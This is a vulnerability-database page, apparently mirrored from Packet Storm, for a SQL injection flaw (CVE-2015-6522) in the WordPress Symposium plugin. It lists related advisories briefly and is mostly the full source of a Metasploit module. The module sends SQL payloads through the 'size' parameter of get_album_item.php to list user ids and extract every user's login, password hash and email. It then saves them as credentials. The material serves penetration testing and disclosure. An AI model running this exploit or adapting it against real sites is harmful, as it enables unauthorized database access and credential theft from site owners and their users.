Lucene search

K

WordPress Symposium Plugin SQL Injection

๐Ÿ—“๏ธย 31 Aug 2024ย 00:00:00Reported byย Matteo Cantoni, PizzaHatHacker, metasploit.comTypeย 
packetstorm
ย packetstorm
๐Ÿ”—ย packetstormsecurity.com๐Ÿ‘ย 38ย Views

SQL Injection in WordPress Symposium Plugin allows remote attackers to extract credentials via the size parameter to get_album_item.php.

Show more
Related
Code
ReporterTitlePublishedViews
Family
WPVulnDB
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
9 Aug 201500:00
โ€“wpvulndb
Check Point Advisories
WordPress Symposium Plugin SQL Injection (CVE-2015-6522)
8 Dec 201600:00
โ€“checkpoint_advisories
Prion
Sql injection
19 Aug 201515:59
โ€“prion
wpexploit
WP Symposium <= 15.5.1 - Unauthenticated SQL Injection
9 Aug 201500:00
โ€“wpexploit
Patchstack
WordPress Symposium Plugin 15.1 - SQL Injection #2
18 Aug 201500:00
โ€“patchstack
Patchstack
WordPress Symposium Plugin <= 15.7- SQL Injection
19 Aug 201500:00
โ€“patchstack
Metasploit
WordPress Symposium Plugin SQL Injection
17 Nov 201614:04
โ€“metasploit
OpenVAS
WordPress WP Symposium Multiple SQL Injection Vulnerabilities
24 Aug 201500:00
โ€“openvas
Cvelist
CVE-2015-6522
19 Aug 201515:00
โ€“cvelist
CVE
CVE-2015-6522
19 Aug 201515:59
โ€“cve
Rows per page
`##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HTTP::Wordpress  
  
def initialize(info = {})  
super(  
update_info(  
info,  
'Name' => 'WordPress Symposium Plugin SQL Injection',  
'Description' => %q{  
This module exploits a SQL injection vulnerability in the WP Symposium plugin  
before 15.8 for WordPress, which allows remote attackers to extract credentials  
via the size parameter to get_album_item.php.  
},  
'Author' => [  
'PizzaHatHacker', # Vulnerability discovery  
'Matteo Cantoni <goony[at]nothink.org>' # Metasploit module  
],  
'License' => MSF_LICENSE,  
'References' => [  
['CVE', '2015-6522'],  
['EDB', '37824']  
],  
'DisclosureDate' => '2015-08-18'  
)  
)  
  
register_options(  
[  
OptString.new('URI_PLUGIN', [true, 'The WordPress Symposium Plugin URI', 'wp-symposium'])  
]  
)  
end  
  
def check  
check_plugin_version_from_readme('wp-symposium', '15.8.0', '15.5.1')  
end  
  
def uri_plugin  
normalize_uri(wordpress_url_plugins, datastore['URI_PLUGIN'], 'get_album_item.php')  
end  
  
def send_sql_request(sql_query)  
uri_complete = normalize_uri(uri_plugin)  
  
begin  
res = send_request_cgi(  
'method' => 'GET',  
'uri' => uri_complete,  
'vars_get' => { 'size' => sql_query }  
)  
  
return nil if res.nil? || res.code != 200 || res.body.nil?  
  
res.body  
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE => e  
vprint_error("#{peer} - The host was unreachable!")  
return nil  
end  
end  
  
def run  
vprint_status("#{peer} - Attempting to connect...")  
vprint_status("#{peer} - Trying to retrieve the first user id...")  
first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')  
if first_id.nil?  
vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")  
return  
else  
vprint_status("#{peer} - First user-id is '#{first_id}'")  
end  
  
vprint_status("#{peer} - Trying to retrieve the last user id...")  
last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')  
if last_id.nil?  
vprint_error("#{peer} - Failed to retrieve the last user id")  
return  
else  
vprint_status("#{peer} - Last user-id is '#{last_id}'")  
end  
  
credentials = ''  
  
vprint_status("#{peer} - Trying to retrieve the users information...")  
for user_id in first_id..last_id  
separator = Rex::Text.rand_text_numeric(7, bad = '0')  
user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")  
  
if user_info.nil?  
vprint_error("#{peer} - Failed to retrieve the users info")  
return  
else  
values = user_info.split(separator.to_s)  
  
user_login = values[0]  
user_pass = values[1]  
user_email = values[2]  
  
print_good("#{peer} - #{sprintf('%-15s %-34s %s', user_login, user_pass, user_email)}")  
connection_details = {  
module_fullname: fullname,  
username: user_login,  
private_data: user_pass,  
private_type: :nonreplayable_hash,  
status: Metasploit::Model::Login::Status::UNTRIED,  
proof: user_email  
}.merge(service_details)  
create_credential(connection_details)  
  
credentials << "#{user_login},#{user_pass},#{user_email}\n"  
end  
end  
  
unless credentials.empty?  
loot = store_loot('wp_symposium.http', 'text/plain', rhost, credentials)  
vprint_good("Credentials saved in: #{loot}")  
end  
end  
end  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contactย us for a demo andย discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo